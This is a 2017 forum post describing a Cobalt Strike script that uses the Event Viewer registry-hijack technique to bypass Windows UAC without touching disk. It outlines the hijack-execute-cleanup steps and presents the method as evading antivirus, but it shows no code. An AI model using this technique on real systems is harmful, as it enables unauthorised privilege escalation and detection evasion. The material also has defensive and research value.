Admin-Ahead Community

Windows => General Windows => Topic started by: sujitht on September 28, 2017, 11:30:51 pm

Title: Eventvwr File-less UAC Bypass CNA
Post by: sujitht on September 28, 2017, 11:30:51 pm
(https://snag.gy/wt7WUr.jpg)
Matt Nelson recently released a very useful, file-less UAC bypass using Event Viewer which was quickly implemented in to a Metasploit module by @TheColonial. Following this, we decided to release our own implementation in the form of a Cobalt Strike CNA script. The current default UAC bypass in Cobalt Strike requires DLL hijacking and drops a temporary DLL artefact to disk, as shown in the following:
(https://snag.gy/cfzqgr.jpg)
Bypassuac-eventvwr was created as a way to easily utilise the EventVwr UAC bypass technique and maintain good opsec practices by not touching disk. This method does not require writing to disk and therefore should be AV friendly.
The CNA script currently performs the following:

    Write registry path hijack
    Execute eventvwr.exe
    When eventvwr.exe executes, the hijack will be called
    If SMB is used, linking is performed to the new beacon
    Delete registry path hijack
    Enjoy elevated beacon
An example usage is shown below:
(https://snag.gy/WfYZXy.jpg)